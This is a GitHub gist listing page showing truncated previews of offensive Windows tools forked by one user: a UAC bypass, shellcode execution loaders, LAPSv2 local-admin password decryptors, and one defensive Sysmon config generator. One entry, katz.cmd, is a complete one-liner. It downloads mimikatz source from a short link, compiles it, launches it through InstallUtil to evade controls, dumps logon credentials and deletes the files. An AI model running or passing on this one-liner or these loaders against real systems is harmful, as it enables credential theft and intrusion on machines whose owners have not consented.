DevGK MsF-NTDLL
MsF-NTDLL
/ LOLDriverConfig.ps1
Created
September 2, 2023 03:10
— forked from jsecurity101/LOLDriverConfig.ps1
PowerShell script that creates an audit or block Sysmon config based off of LOLDrivers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Author: Jonathan Johnson (@jsecurity101) | |
| function New-DriverConfig { | |
| <# | |
| .EXAMPLE | |
| New-DriverConfig -Block | |
| Creates driver block config in the current directory | |
| .EXAMPLE |
MsF-NTDLL
/ TaskManagerSecret.c
Created
August 30, 2023 02:14
— forked from antonioCoco/TaskManagerSecret.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| TaskManagerSecret | |
| Author: @splinter_code | |
| This is a very ugly POC for a very unreliable UAC bypass through some UI hacks. | |
| The core of this hack is stealing and using a token containing the UIAccess flag set. | |
| A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html | |
| From there it uses a task manager "feature" to run a new High IL cmd.exe. | |
| This has been developed only for fun and shouldn't be used due to its high unreliability. |
MsF-NTDLL
/ shitcode.c
Created
May 22, 2023 05:52
— forked from susMdT/shitcode.c
hahaha da shellcode go brrrr
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Core.h> | |
| #include <Win32.h> | |
| #include <Structs.h> | |
| #include <Sleep.h> | |
| #include <Utils.h> | |
| SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance) | |
| { |
MsF-NTDLL
/ lapsv2_decryptor.py
Created
May 18, 2023 01:44
— forked from zblurx/lapsv2_decryptor.py
Simple script to extract local admin password in cleartext with LAPSv2 using impacket
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import typing | |
| import math | |
| from uuid import UUID | |
| from pyasn1.codec.der import decoder | |
| from pyasn1_modules import rfc5652 | |
| from struct import unpack | |
| from cryptography import utils | |
| from cryptography.exceptions import AlreadyFinalized, InvalidKey | |
| from cryptography.hazmat.primitives.kdf import KeyDerivationFunction |
MsF-NTDLL
/ Source.cpp
Created
May 6, 2023 01:54
— forked from alfarom256/Source.cpp
Thread Execution via NtCreateWorkerFactory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <winternl.h> | |
| #include <stdio.h> | |
| #define WORKER_FACTORY_FULL_ACCESS 0xf00ff | |
| // https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52 | |
| typedef enum _WORKERFACTORYINFOCLASS | |
| { | |
| WorkerFactoryTimeout, // LARGE_INTEGER |
MsF-NTDLL
/ shellcode_exec_workerfactory.c
Created
May 6, 2023 01:53
— forked from RistBS/shellcode_exec_workerfactory.c
Just another shellcode execution technique :)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <stdio.h> | |
| #define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__) | |
| #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) | |
| #define WORKER_FACTORY_FULL_ACCESS 0xf00ff | |
| typedef struct _UNICODE_STRING { |
MsF-NTDLL
/ Entry.c
Created
May 6, 2023 01:53
— forked from realoriginal/Entry.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| D_SEC( A ) NTSTATUS NTAPI Entry( _In_ PVOID Parameter ) | |
| { | |
| PARSED_BUF Psr; | |
| UINT32 Wrt = 0; | |
| PARG Arg = NULL; | |
| LPWSTR Nps = NULL; | |
| HANDLE Pip = NULL; |
MsF-NTDLL
/ shellBigInt.cs
Created
May 5, 2023 02:24
— forked from djhohnstein/shellBigInt.cs
Shellcode Stuffed in BigInteger
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sing System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee |
MsF-NTDLL
/ LAPSDecrypt.cs
Created
April 18, 2023 01:28
— forked from xpn/LAPSDecrypt.cs
Quick POC looking at how encryption works for LAPS (v2)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.DirectoryServices.Protocols; | |
| using System.Globalization; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using System.Runtime.InteropServices.ComTypes; | |
| using System.Security.Policy; | |
| using System.Text; | |
| using System.Threading.Tasks; |
MsF-NTDLL
/ katz.cmd
Created
April 14, 2023 06:39
— forked from xillwillx/katz.cmd
mimikatz.cs one-liner
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* |
NewerOlder